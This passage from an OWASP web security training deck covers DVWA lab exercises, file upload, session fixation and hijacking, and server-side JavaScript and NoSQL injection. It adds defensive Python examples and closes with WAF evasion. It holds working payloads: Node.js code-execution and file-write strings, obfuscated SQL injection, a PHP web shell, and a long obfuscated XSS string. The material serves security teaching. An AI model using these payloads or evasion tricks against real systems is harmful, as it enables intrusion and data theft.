![Page 101: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/101.jpg)
https://172.17.0.42/dvwa/ Command Execution
EXERCISE – Command Injection
![Page 102: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/102.jpg)
Upload a dynamic file (i.e. php, asp, aspx, jsp, etc.)
Run the dynamic code by going to the file using a web browser
◦ http://victim.com/uploads/shell.php
Arbitrary File Upload
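Server-side checks that close the upload-then-browse path described above. This is an added example, not code from the slides or from DVWA; the allowed types and their magic bytes are the editor's choice for the demonstration and the sample file contents are constructed inline. It allowlists the final extension, refuses names with extra dots or null bytes, checks the content against the claimed type and stores the file under a random server-chosen name.

```python
"""Validation for a file upload endpoint."""
import os
import secrets

# allowed extension -> magic bytes the content must start with
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def stored_name_for(filename: str, data: bytes) -> str:
    """Return the server-side name to store the upload under, or raise ValueError."""
    base = os.path.basename(filename.replace("\\", "/"))        # drop any client-supplied path
    if not base or "\x00" in base or base.startswith("."):     # 'shell.php\x00.jpg', '.htaccess'
        raise ValueError("bad filename")
    parts = base.lower().split(".")
    if len(parts) != 2:        # 'shell.php.jpg' and 'shell.jpg.php' both carry two extensions
        raise ValueError("exactly one extension expected")
    ext = parts[1]
    if ext not in ALLOWED:                                     # 'shell.php', 'shell.phtml', ...
        raise ValueError(f"extension not allowed: {ext}")
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        raise ValueError("content does not match extension")   # PHP source named photo.jpg
    # The client's name never reaches the filesystem; a random name also prevents overwrites.
    return f"{secrets.token_hex(16)}.{ext}"


def accepted(filename: str, data: bytes) -> bool:
    try:
        stored_name_for(filename, data)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    php = b"<?php system($_GET['cmd']); ?>"                     # constructed web shell
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16                   # constructed JPEG header
    for name, data in [("shell.php", php), ("shell.php.jpg", php), ("shell.jpg.php", php),
                       ("shell.php\x00.jpg", php), ("photo.jpg", php), ("photo.JPG", jpeg)]:
        print(f"{name!r:24} {'accepted' if accepted(name, data) else 'rejected'}")
```

The single-extension rule exists because Apache's mod_mime evaluates every extension in a name, so x.php.jpg can still be handed to PHP; the magic-byte check catches PHP source uploaded under an image name. Store the result outside the web root, or on a host that never executes scripts from the upload directory, and the browse-to-shell.php step has nothing to hit.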
![Page 103: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/103.jpg)
https://172.17.0.42/dvwa/ → Upload. Use the files at https://172.17.0.144/downloads/
EXERCISE – Arbitrary File Upload
![Page 104: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/104.jpg)
Cookie: admin=false
Cookie: 139434
Cookie: logged_in=false
Values like these invite tampering: flip admin=false to true, or increment the numeric ID to step into another user's session.
Burp Sequencer can be used to test whether session tokens are predictable (low entropy), which makes hijacking by guessing possible
Session Manipulation and Session Hijacking
![Page 105: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/105.jpg)
Padding Oracle Attack (POET tool): when a server reveals whether a CBC-encrypted cookie or token decrypted to valid padding, an attacker can decrypt and forge that token without the key; POET (Padding Oracle Exploit Tool) automates the attack
Session Manipulation and Session Hijacking
![Page 106: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/106.jpg)
http://victim.com/login.php?SESSID=4v0rmq4gosaag63rla631gl5m2
http://victim.com/login.php?SESSID=aaaaaaaaaaaaaaaaaaaaaaaaaa
Send the second link to someone else; the application accepts the attacker-chosen SESSID from the URL and sets it as their cookie. Let them log in, then present the same SESSID to take over their authenticated session. The fix is to never accept session IDs from the URL and to issue a fresh ID at login.
Session Fixation
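The fixation scenario above, simulated against two in-memory session stores: one that adopts whatever SESSID the request carries and one that only honours IDs it issued and regenerates the ID at login. This is an added example, not code from the slides; the attacker and victim are plain function calls, no HTTP or cookies are involved, and tokens come from secrets.token_urlsafe (os.urandom), the kind of value the Burp Sequencer check on the previous slides would not flag as predictable.

```python
"""Session fixation: a fixable session store beside a hardened one."""
import secrets
from typing import Dict, Optional


class FixableApp:
    """Uses whatever SESSID the request carries (cookie or ?SESSID=...) and keeps it across login."""

    def __init__(self) -> None:
        self.sessions: Dict[str, dict] = {}

    def visit(self, session_id: Optional[str] = None) -> str:
        # An unknown ID is simply adopted: this is the fixation point.
        if session_id is None:
            session_id = secrets.token_urlsafe(24)
        self.sessions.setdefault(session_id, {"user": None})
        return session_id

    def login(self, session_id: str, user: str) -> str:
        self.sessions[session_id]["user"] = user
        return session_id               # same ID before and after authentication

    def whoami(self, session_id: str) -> Optional[str]:
        return self.sessions.get(session_id, {}).get("user")


class HardenedApp(FixableApp):
    def visit(self, session_id: Optional[str] = None) -> str:
        # Only IDs this server issued are honoured; anything else is replaced.
        if session_id not in self.sessions:
            session_id = secrets.token_urlsafe(24)
            self.sessions[session_id] = {"user": None}
        return session_id

    def login(self, session_id: str, user: str) -> str:
        # Regenerate at the privilege change: the pre-login ID stops working.
        self.sessions.pop(session_id, None)
        new_id = secrets.token_urlsafe(24)
        self.sessions[new_id] = {"user": user}
        return new_id


def fixation_attack(app: FixableApp) -> Optional[str]:
    """Attacker fixes the ID, the victim logs in with it; return what the attacker's ID now sees."""
    fixed = "aaaaaaaaaaaaaaaaaaaaaaaaaa"
    victim_id = app.visit(fixed)        # victim follows http://victim.com/login.php?SESSID=aaaa...
    app.login(victim_id, "victim")
    return app.whoami(fixed)            # attacker presents the fixed ID afterwards


if __name__ == "__main__":
    print("fixable app, attacker sees: ", fixation_attack(FixableApp()))    # victim
    print("hardened app, attacker sees:", fixation_attack(HardenedApp()))   # None
```

In a real application the regenerated ID is also the moment to set the cookie with the Secure, HttpOnly and SameSite attributes, so the replacement token cannot itself be read or fixed from the client side.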
![Page 107: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/107.jpg)
Node.js
MongoDB (NoSQL with a JavaScript engine)
CouchDB (NoSQL with a JavaScript engine)
Javascript Server Side Injection
![Page 108: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/108.jpg)
POST /test/ HTTP/1.1
Host: 192.168.1.123
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

response.end('pwnd');
The POST body is JavaScript. If the server passes request data to eval() or an equivalent, the response body reads pwnd, confirming server-side injection; the payloads on the next slide then run with the privileges of the Node.js process.
Javascript Server Side Injection
![Page 109: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/109.jpg)
response.end('<script>alert(1)</script>');
var fs = require('fs'); response.end(fs.readdirSync('c:\\').toString());
var fs = require('fs'); response.end(fs.writeFileSync('c:\\secret.txt', 'littleSecret'));
require('child_process').spawn('c:\\windows\\system32\\calc.exe'); response.end('success');
Javascript Server Side Injection
![Page 110: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/110.jpg)
NoSQL databases store data as key-value pairs, documents or wide columns rather than relational tables
NoSQL databases are usually schemaless, so they are not strict about the shape or type of the data you insert or query with
NoSQL database implementations do not speak standard SQL: queries are built from JSON objects or JavaScript, so injection targets those (a query operator smuggled in through a JSON value, or code handed to the server-side JavaScript engine) rather than SQL syntax
NoSQL Injection
![Page 111: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/111.jpg)
Try characters one by one in the GET or POST to see if specific characters are blocked
WAFs very often drop your traffic (Burp will usually time out and your browser will show an error)
Instead of
◦ or '1'='1'--
Try
◦ Or/**/'2'/**/LiKe/**/'2
Instead of
◦ waitfor delay '0:0:20'--
Try
◦ WaItFoR+dElAy+'0:0:20'--
Mixed case, inline comments in place of spaces, a different comparison operator and URL-encoded spaces (+) all defeat naive signature matching. Note that waitfor is a single T-SQL keyword and must stay one token; only the spaces around it can be varied.
Defeating IDS/IPS/WAF
![Page 112: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/112.jpg)
Instead of
◦ admin
Try
◦ char(0x61)%2bchar(0x64)%2bchar(0x6D)%2bchar(0x69)%2bchar(0x6E) (%2b is a URL-encoded +, which concatenates the characters in T-SQL)
Instead of
◦ ' union select password from users --%20
Try
◦ '(union(select(password)from(users))--((1))
Defeating IDS/IPS/WAF
![Page 113: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/113.jpg)
Change GET to POST or POST to GET, or use HEAD
Network-level tricks: use IPv6, or change the IP version field from 4 to 5 (IPv5)
HTTP Parameter Pollution
◦ http://victim.com/admin.php?userid=1&userid=2
⚫ ASP concatenates: 1,2
⚫ PHP takes the last occurrence
⚫ Java takes the first occurrence
⚫ A WAF that reads the parameter differently from the backend inspects a different value from the one the application uses
Change Content-Type
◦ Content-Type: multipart/; boundry=0000 (deliberately malformed)
⚫ (evasion of ModSecurity CRS)
Defeating IDS/IPS/WAF
![Page 114: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/114.jpg)
There are many ways in a database to do the same thing, so a signature for one form misses the others; e.g. for the database version:
◦ @@version (MSSQL, MySQL)
◦ version() (MySQL, PostgreSQL)
◦ select banner from v$version where banner like 'Oracle%' (Oracle)
◦ select version from v$instance (Oracle)
Defeating IDS/IPS/WAF
![Page 115: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/115.jpg)
Non alphanumeric XSS
◦ eval("aler"+(!![]+[])[+[]])("xss")
◦ window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]
Each bracketed term indexes one character out of the string form of true, false, undefined or NaN: "true"[0] is t, "NaN"[1] is a, "false"[2] is l, "undefined"[3] is e and "true"[1] is r, so both expressions spell alert without a single letter appearing in the payload.
Defeating IDS/IPS/WAF
![Page 116: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/116.jpg)
[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()([][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]
+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()(([]+{})[+[]])[+[]]+(!+[]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[]))+(+!![]+[])+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!
![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()([][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()(([]+{})[+[]])[+[]]+(!+[]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[]))+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!!
[]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()([][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+
!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()(([]+{})[+[]])[+[]]+(!+[]+!![]+!![]+[])+([]+{})[!+[]+!![]]))()
Defeating IDS/IPS/WAF
![Page 117: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/117.jpg)
Questions?